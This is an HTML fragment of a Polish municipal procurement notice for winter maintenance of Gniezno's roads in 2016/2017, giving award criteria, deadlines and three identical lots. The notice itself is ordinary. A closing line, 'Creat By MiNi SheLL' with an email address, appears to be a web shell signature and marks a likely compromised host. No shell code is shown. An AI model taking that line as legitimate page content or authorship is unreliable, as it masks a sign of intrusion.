                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas rozpoczęcia akcji </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający niniejszym przewiduje możliwość dokonania następujących istotnych zmian postanowień niniejszej umowy oraz określa zakres, charakter oraz warunki wprowadzenia zmian:
1.	Zmiana terminu wykonania przedmiotu umowy, w przypadku działania siły wyższej                               w rozumieniu przepisów kodeksu cywilnego, uniemożliwiającej wykonanie przedmiotu umowy w określonym terminie, o czas działania siły wyższej oraz czas potrzebny do usunięcia tych skutków. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 17/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>zadanie nr 1 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg gminnych na terenie gminy Gniezno- zima 2016/2017
      Świadczenie usług w zakresie utrzymania dróg gminnych w okresie zimy 2016/2017 tj. odśnieżanie                  i zwalczanie skutków gołoledzi- podsypywanie pisakiem z solą dróg gminnych na terenie Gminy Gniezno. Usługi będą wykonywane przez Wykonawcę  w zależności od warunków atmosferycznych po ówczesnym zgłoszeniu Zamawiającego. Wykonawca zobowiązany jest podać nr telefonu pod którym będzie dostępny przez 24 godziny na dobę. Ponadto, Wykonawca winien podać kontakt telefoniczny do operatorów sprzętu oraz określić dokładnie rejonizację tj. kto personalnie ja jakim terenie będzie pracował. Wykonawca zobowiązany jest   posiadać w dyspozycji środki transportowe  sprzęt wraz z niezbędnymi materiałami uszorstniającymi: piasek, sól. 
Wszystkie drogi gminne o nawierzchni ulepszonej utrzymywane winny być w standardzie IV,                        a wszystkie pozostałe w standardzie V. 
Przy wycenie usług w zakresie odśnieżania należy podać środki transportowe- sprzęt z wyceną za 1 godzinę świadczonej usługi, bez kosztów dojazdu. 
Przy wycenie usług w zakresie zwalczania skutków gołoledzi należy podać środki transportowe- sprzęt za 1 godzinę świadczonej usługi wraz z niezbędnymi materiałami uszorstniającymi: piasek, sól, bez kosztów dojazdu. 
W zakres niniejszego postępowania wchodzi również droga z Gniezna do Jankowa Dolnego, długość 3450 mb, która wymaga utrzymania w standardzie III. 
Przy wycenie usług w zakresie jej utrzymania należy wycenić j.w. odrębnie odśnieżanie ( środki transportowe, sprzęt, bez kosztów dojazdu) i odrębnie zwalczanie skutków gołoledzi ( środki transportowe, sprzęt, materiały uszorstniające, bez kosztów dojazdu) za 1 godzinę. 
Wykonawca winien oświadczyć, czy zamówienia będzie wykonywał samodzielnie czy przy pomocy podwykonawców- ze wskazaniem części zamówienia, której powierzy podwykonawcom. 
Zamawiający dopuszcza składania ofert częściowych i na odśnieżanie i zwalczanie skutków gołoledzi łącznie na poszczególnie trzy rejony kolorystycznie określone wg załącznika mapowego, nie dopuszcza składania ofert wariantowych. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas podjęci interwenci </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>zadanie nr 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg gminnych na terenie gminy Gniezno- zima 2016/2017
      Świadczenie usług w zakresie utrzymania dróg gminnych w okresie zimy 2016/2017 tj. odśnieżanie                  i zwalczanie skutków gołoledzi- podsypywanie pisakiem z solą dróg gminnych na terenie Gminy Gniezno. Usługi będą wykonywane przez Wykonawcę  w zależności od warunków atmosferycznych po ówczesnym zgłoszeniu Zamawiającego. Wykonawca zobowiązany jest podać nr telefonu pod którym będzie dostępny przez 24 godziny na dobę. Ponadto, Wykonawca winien podać kontakt telefoniczny do operatorów sprzętu oraz określić dokładnie rejonizację tj. kto personalnie ja jakim terenie będzie pracował. Wykonawca zobowiązany jest   posiadać w dyspozycji środki transportowe  sprzęt wraz z niezbędnymi materiałami uszorstniającymi: piasek, sól. 
Wszystkie drogi gminne o nawierzchni ulepszonej utrzymywane winny być w standardzie IV,                        a wszystkie pozostałe w standardzie V. 
Przy wycenie usług w zakresie odśnieżania należy podać środki transportowe- sprzęt z wyceną za 1 godzinę świadczonej usługi, bez kosztów dojazdu. 
Przy wycenie usług w zakresie zwalczania skutków gołoledzi należy podać środki transportowe- sprzęt za 1 godzinę świadczonej usługi wraz z niezbędnymi materiałami uszorstniającymi: piasek, sól, bez kosztów dojazdu. 
W zakres niniejszego postępowania wchodzi również droga z Gniezna do Jankowa Dolnego, długość 3450 mb, która wymaga utrzymania w standardzie III. 
Przy wycenie usług w zakresie jej utrzymania należy wycenić j.w. odrębnie odśnieżanie ( środki transportowe, sprzęt, bez kosztów dojazdu) i odrębnie zwalczanie skutków gołoledzi ( środki transportowe, sprzęt, materiały uszorstniające, bez kosztów dojazdu) za 1 godzinę. 
Wykonawca winien oświadczyć, czy zamówienia będzie wykonywał samodzielnie czy przy pomocy podwykonawców- ze wskazaniem części zamówienia, której powierzy podwykonawcom. 
Zamawiający dopuszcza składania ofert częściowych i na odśnieżanie i zwalczanie skutków gołoledzi łącznie na poszczególnie trzy rejony kolorystycznie określone wg załącznika mapowego, nie dopuszcza składania ofert wariantowych. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 31/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas podjęcia reacji </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>zadane nr 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg gminnych na terenie gminy Gniezno- zima 2016/2017
      Świadczenie usług w zakresie utrzymania dróg gminnych w okresie zimy 2016/2017 tj. odśnieżanie                  i zwalczanie skutków gołoledzi- podsypywanie pisakiem z solą dróg gminnych na terenie Gminy Gniezno. Usługi będą wykonywane przez Wykonawcę  w zależności od warunków atmosferycznych po ówczesnym zgłoszeniu Zamawiającego. Wykonawca zobowiązany jest podać nr telefonu pod którym będzie dostępny przez 24 godziny na dobę. Ponadto, Wykonawca winien podać kontakt telefoniczny do operatorów sprzętu oraz określić dokładnie rejonizację tj. kto personalnie ja jakim terenie będzie pracował. Wykonawca zobowiązany jest   posiadać w dyspozycji środki transportowe  sprzęt wraz z niezbędnymi materiałami uszorstniającymi: piasek, sól. 
Wszystkie drogi gminne o nawierzchni ulepszonej utrzymywane winny być w standardzie IV,                        a wszystkie pozostałe w standardzie V. 
Przy wycenie usług w zakresie odśnieżania należy podać środki transportowe- sprzęt z wyceną za 1 godzinę świadczonej usługi, bez kosztów dojazdu. 
Przy wycenie usług w zakresie zwalczania skutków gołoledzi należy podać środki transportowe- sprzęt za 1 godzinę świadczonej usługi wraz z niezbędnymi materiałami uszorstniającymi: piasek, sól, bez kosztów dojazdu. 
W zakres niniejszego postępowania wchodzi również droga z Gniezna do Jankowa Dolnego, długość 3450 mb, która wymaga utrzymania w standardzie III. 
Przy wycenie usług w zakresie jej utrzymania należy wycenić j.w. odrębnie odśnieżanie ( środki transportowe, sprzęt, bez kosztów dojazdu) i odrębnie zwalczanie skutków gołoledzi ( środki transportowe, sprzęt, materiały uszorstniające, bez kosztów dojazdu) za 1 godzinę. 
Wykonawca winien oświadczyć, czy zamówienia będzie wykonywał samodzielnie czy przy pomocy podwykonawców- ze wskazaniem części zamówienia, której powierzy podwykonawcom. 
Zamawiający dopuszcza składania ofert częściowych i na odśnieżanie i zwalczanie skutków gołoledzi łącznie na poszczególnie trzy rejony kolorystycznie określone wg załącznika mapowego, nie dopuszcza składania ofert wariantowych. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 31/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas podjęcia reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com